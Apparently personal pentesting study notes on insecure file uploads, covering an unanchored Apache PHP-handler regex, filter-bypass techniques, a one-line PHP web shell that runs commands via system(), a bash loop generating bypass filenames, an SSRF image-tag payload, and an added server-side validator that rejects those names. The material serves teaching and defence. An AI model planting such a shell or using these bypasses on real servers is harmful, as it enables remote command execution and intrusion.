# File upload

```apache
<FilesMatch ".+\.ph(ar|p|tml)">
    SetHandler application/x-httpd-php
</FilesMatch>
```

The above configuration is how the web server decides which files are executed as PHP code. It is a whitelist: a regex matching the .phar, .php and .phtml extensions. Note that the pattern has no trailing `$`, so it is unanchored and also matches when the PHP extension sits in the middle of a name such as `name.php.jpg`; anchoring the regex is the server-side fix for that.

```bash
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/web/content-type.txt
cat content-type.txt | grep 'image/' > image-content-types.txt
```

PHP extension wordlists:
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/web-extensions.txt
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FSsVSI02RUV7OwLF9JlAo%2Fimage.png?alt=media\&token=049cafd7-a0a1-4010-a3ed-c6d465d8c65f)

Bypassing whitelist and blacklist

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2F9RjGmwvgYUBIqEdf4bvH%2Fimage.png?alt=media\&token=5e192733-c410-48a7-ae81-c260a81f9b9c)

Challenge: the server employs client-side, blacklist, whitelist, Content-Type and MIME-type filters to ensure the uploaded file is an image. Combine all of the attacks to bypass the filters and upload a PHP file.

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FN1tBlg1KiiUssn2ouRE4%2Fimage.png?alt=media\&token=8fc2e3b7-81e5-405e-8829-abd4be8bb1d4)

SVG XXE: read a file

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FLKR00lDLVeb7qg9OiI88%2Fimage.png?alt=media\&token=ee1cdfbb-964a-4865-a85e-d5f8b6a3067f)

```php
// shell
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>
```

Fuzz Content-Type

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FhEfLzgtscVAWOuyeFHKC%2Fimage.png?alt=media\&token=a01a3e4a-3e58-4903-822e-953d1e9e2d38)

Grab the Content-Type wordlist:
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
(the wget and grep commands above extract the image/ entries into image-content-types.txt)

We can write a small bash script that generates all permutations of the file name, where the above characters would be injected before and after both the PHP and JPG extensions, as follows:

```bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
```
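A server-side validator, added here as an example and not code from these notes, that rejects every filename permutation the loop above generates, along with spoofed Content-Type values, bodies whose magic bytes do not match, and SVG uploads; the allowlist, function names and sample bytes are assumptions.

```python
import re

# Constructed allowlist for an image upload endpoint (assumption):
# extension -> (expected Content-Type, accepted magic-byte prefixes)
ALLOWED = {
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    "gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}
# Base name of plain ASCII letters/digits/-/_, then exactly one extension.
# Anchored with $, unlike the FilesMatch regex above, so "x.php.jpg" fails.
_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def validate_upload(filename, content_type, head):
    """Return (ok, reason) for an upload given its name, Content-Type header
    value and the first bytes of its body."""
    if any(ord(c) < 0x20 or ord(c) > 0x7e for c in filename):
        return False, "control or non-ASCII character in name"  # \x00, \n, etc.
    if "%" in filename:
        return False, "percent-encoding in name"  # %00 %20 %0a %0d0a
    if any(c in filename for c in "/\\:"):
        return False, "path separator in name"
    m = _NAME_RE.match(filename)
    if not m:
        return False, "name must be base.ext with a single extension"
    ext = m.group(1).lower()
    if ext not in ALLOWED:  # php, phps, phtml, phar, svg all end here
        return False, "extension not allowed"
    mime, magics = ALLOWED[ext]
    if content_type.split(";")[0].strip().lower() != mime:
        return False, "Content-Type does not match extension"
    if not any(head.startswith(mg) for mg in magics):
        return False, "file body does not match extension"
    return True, "ok"


def all_permutations_rejected():
    """Replay the filename permutations from the bash loop above against
    the validator with an otherwise valid JPEG body; True if none pass."""
    chars = ["%20", "%0a", "%00", "%0d0a", "/", ".\\", ".", "…", ":"]
    names = []
    for c in chars:
        for e in (".php", ".phps"):
            names += [f"shell{c}{e}.jpg", f"shell{e}{c}.jpg",
                      f"shell.jpg{c}{e}", f"shell.jpg{e}{c}"]
    return all(not validate_upload(n, "image/jpeg", b"\xff\xd8\xff\xe0")[0]
               for n in names)
```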

Extensions impact: PDF. HTML rendered inside a generated PDF can lead to SSRF or blind XXE, e.g. an image tag pointing at an internal host: `<img src=http://10.10.0.1/x?=imgtag>`
